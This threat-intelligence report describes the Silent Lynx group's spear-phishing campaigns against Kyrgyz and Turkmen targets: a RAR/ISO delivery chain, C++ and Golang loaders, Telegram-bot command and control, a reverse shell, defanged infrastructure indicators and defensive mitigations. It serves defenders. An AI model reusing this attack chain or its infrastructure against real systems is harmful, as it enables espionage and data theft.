Full Report
A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha said in a technical report
Analysis Summary
# Threat Actor: Silent Lynx
## Attribution & Identity
* **Identified Name:** Silent Lynx
* **Attribution:** Assessed to be a Kazakhstan-origin threat actor (with medium confidence).
* **Associated Groups:** Observed tactical overlaps with YoroTrooper (aka SturgeonPhisher).
## Activity Summary
Silent Lynx has been linked to cyberattacks targeting entities in **Kyrgyzstan and Turkmenistan**. The group has a history of targeting entities across **Eastern Europe and Central Asian government think tanks** involved in economic decision-making and the banking sector.
Observed campaigns include:
1. **Campaign 1 (Detected Dec 27, 2024):** Involved a spear-phishing email with a RAR attachment leading to an ISO file. The ISO contained a malicious C++ binary and a decoy PDF, which ultimately launched a PowerShell script for command and control/exfiltration via Telegram bots.
2. **Campaign 2:** Involved a malicious RAR archive containing a decoy PDF and a Golang executable designed to establish a reverse shell.
## Tactics, Techniques & Procedures
* **Initial Access/Delivery:** Spear-phishing emails containing RAR archive attachments.
* **Payload Delivery:** Utilizing ISO files (in one campaign) to deliver payloads.
* **Execution:** Use of a malicious **C++ binary** and a **PowerShell script**.
* **Command and Control (C2)/Exfiltration:** Leverage of **Telegram bots** (e.g., "@south\_korea145\_bot" and "@south\_afr\_angl\_bot") for command execution and data exfiltration.
* **Command Execution/Payload Retrieval:** Execution of **`curl` commands** to download secondary payloads from remote infrastructure or Google Drive.
* **Implied Persistence/Access:** Establishment of a **reverse shell** (in the Golang campaign).
* *No specific MITRE ATT&CK IDs were provided in the source text.*
## Targeting
* **Sectors:** Embassies, the banking sector (government-backed banks), lawyers, and government/economic think tanks.
* **Geography:** Kyrgyzstan and Turkmenistan (recent focus); Eastern Europe and Central Asia (historical focus).
* **Victims:** Specific named victims were not listed, only high-level sectors.
## Tools & Infrastructure
* **Malware Families/Loaders:** Custom loaders written in **PowerShell, Golang, and C++**.
* **Infrastructure:**
* Command & Control/Payload Download Server: `pweobmxdlboi[.]com`
* Reverse Shell Destination: `185.122.171[.]22:8082`
* C2/Exfiltration Vectors: Telegram bots ("@south\_korea145\_bot" and "@south\_afr\_angl\_bot").
* Payload Hosting: Google Drive.
## Implications
Silent Lynx employs a sophisticated, multi-stage attack chain utilizing common, legitimate communication platforms (Telegram) for C2, alongside custom binaries in C++/Golang. This suggests an actor focused on achieving deep, persistent access on strategically sensitive government and financial entities within Central Asia. Their use of multiple languages (C++, Golang, PowerShell) indicates adaptive development capabilities.
## Mitigations
* Implement stringent email filtering and inspection for suspicious RAR/ISO attachments, especially those originating from external sources.
* Monitor network traffic for connections to known command-and-control infrastructure (e.g., `pweobmxdlboi[.]com`, `185.122.171[.]22:8082`).
* Apply strong controls over PowerShell execution (e.g., AppLocker, constrained language mode) to prevent script execution from unexpected file types or locations.
* Monitor for unusual network activity communicating with Telegram services for command execution or data exfiltration, if external Telegram usage is not explicitly required for business operations.
* Be cautious of document workflows referencing paths that execute binaries or scripts alongside decoys (ISO containing C++ binary + PDF).